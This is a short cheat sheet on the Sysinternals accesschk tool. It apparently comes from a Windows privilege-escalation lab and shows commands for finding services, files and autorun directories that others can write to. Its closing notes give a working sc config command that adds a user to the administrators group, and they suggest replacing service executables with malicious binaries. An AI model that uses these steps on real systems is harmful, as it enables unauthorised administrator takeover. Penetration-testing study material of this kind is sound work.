accesschk
Description
Sysinternals tool used to check permissions on files, directories, services, and registry keys on Windows systems. It is essential for identifying privilege escalation vectors such as writable services, writable executables, and weak permissions on autorun programs.
Usage 1: Find All Services Writable by Everyone
List all services where the "Everyone" group has write access. This helps identify services whose configuration can be modified for privilege escalation.
Command:
accesschk64.exe -uwcv Everyone *
Flags:
-usuppress errors-wshow objects with write access-cshow services-vverbose output
Usage 2: Check Permissions on a Specific Service
Check the permissions on a specific service (e.g., daclsvc) to see if the current user can modify its configuration.
Command:
accesschk64.exe -uwcv daclsvc
Usage 3: Check Write Access on a File or Directory
Check if the current user has write access to a specific file or directory. Useful for identifying writable executables or autorun programs.
Command:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
Usage 4: Check Permissions on Autorun Program Directory
Verify if you have write access to an autorun program's directory, which can be abused by replacing the executable with a malicious one.
Command:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
Notes
- Part of the Sysinternals suite from Microsoft.
- After confirming write access to a service with
SERVICE_CHANGE_CONFIG, the binary path can be changed:sc config daclsvc binpath="net localgroup administrators user /add" - After confirming write access to an executable, replace it with a malicious binary and restart the service.